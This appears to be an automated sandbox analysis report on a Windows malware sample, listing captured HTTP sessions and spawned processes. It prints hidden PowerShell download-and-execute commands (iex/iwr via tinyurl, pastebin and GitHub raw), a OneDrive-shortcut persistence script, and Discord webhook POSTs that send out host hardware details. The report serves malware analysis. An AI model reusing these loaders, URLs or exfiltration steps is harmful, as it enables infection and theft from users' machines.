                                            2024-10-15 14:08:32 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.849713162.159.136.2324433364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:33 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 216
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:33 UTC216OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 75 62 65 72 74 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                            Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                            2024-10-15 14:08:33 UTC1257INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001314
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOe4xbhUtxpb4QqymtypeX0J4MY2HoX0R64P0lynOZa%2FqywR3hPeseHLJW%2FW2fOhw179RpID%2FZfcGuEkDiFH09lT7yACLJQoOL9oByhy%2BZlrBmAxow67x9Ogjhs"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=071caa7cf962937357e114a6e27d75dfa742eb30-1729001313; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=NcUK2lEgjsnxvrHiCU4VknYATx8I.UozHHWRfgF.gfk-1729001313478-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d3061c0ad916b5f-DFW
                                            2024-10-15 14:08:33 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.849715104.20.4.2354435336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:38 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:39 UTC397INHTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:08:38 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 968
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d3061e23d736b45-DFW
                                            2024-10-15 14:08:39 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:08:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.849717185.199.110.1334435336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:40 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:40 UTC900INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:40 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120065-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1729001320.468643,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: 96d6a4d1f8b6730ceb980411df7263271bf592a9
                                            Expires: Tue, 15 Oct 2024 14:13:40 GMT
                                            Source-Age: 8
                                            2024-10-15 14:08:40 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                            2024-10-15 14:08:40 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:08:40 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:08:40 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:08:40 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                            2024-10-15 14:08:40 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.849718162.159.136.2324435632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:45 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 297
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:45 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                            2024-10-15 14:08:45 UTC1255INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001327
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSkkG8F3pujVaSVtAZIfG9Ht4OEei7Zmhhany3VCo55doCiXyXcD1SO%2FNDaW%2BPKChxlEjfMmFJgxwKns8obO%2Bct5hzfVIQdZtKEBO5ADYUdqCSyz2EyLB0QA1eEg"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=6037ab852f611d9c59da53270f9ef9f7968de046-1729001325; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=ISHjpiQsrSxXfPR9ENjK_tyB.Jn36.Se.X6qJjfRW80-1729001325730-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d30620d3f354750-DFW
                                            2024-10-15 14:08:45 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.849719162.159.136.2324435336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:08:53 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 297
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:53 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                            2024-10-15 14:08:53 UTC1261INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:53 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001335
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BaLmMdDzGUHXS%2F5%2FOVkC%2BecgwBoqf6IlMnSk0nEi1bkArecnSldedeFAa%2F2Cz9pGCUB2fOVHfAPaF4dksBXiSRfh3Egn6wUrw%2F7MuuOnEvWaIAcsKpIsXQDY3tn"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=3cc8826b8e129a25e091786ff5323dda09268d5c-1729001333; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=l0qBvyRSAKsNlkkIOvi66k6mtMXweaE6.S7EcWQGQu8-1729001333690-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d30623eec3f463e-DFW
                                            2024-10-15 14:08:53 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:10:07:55
                                            Start date:15/10/2024
                                            Path:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\vF20HtY4a4.exe"
                                            Imagebase:0x1fd048b0000
                                            File size:24'064 bytes
                                            MD5 hash:D17A39CA8331A4CE65261B1B6DC7E6AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:1
                                            Start time:10:07:55
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:3
                                            Start time:10:07:56
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:10:07:56
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
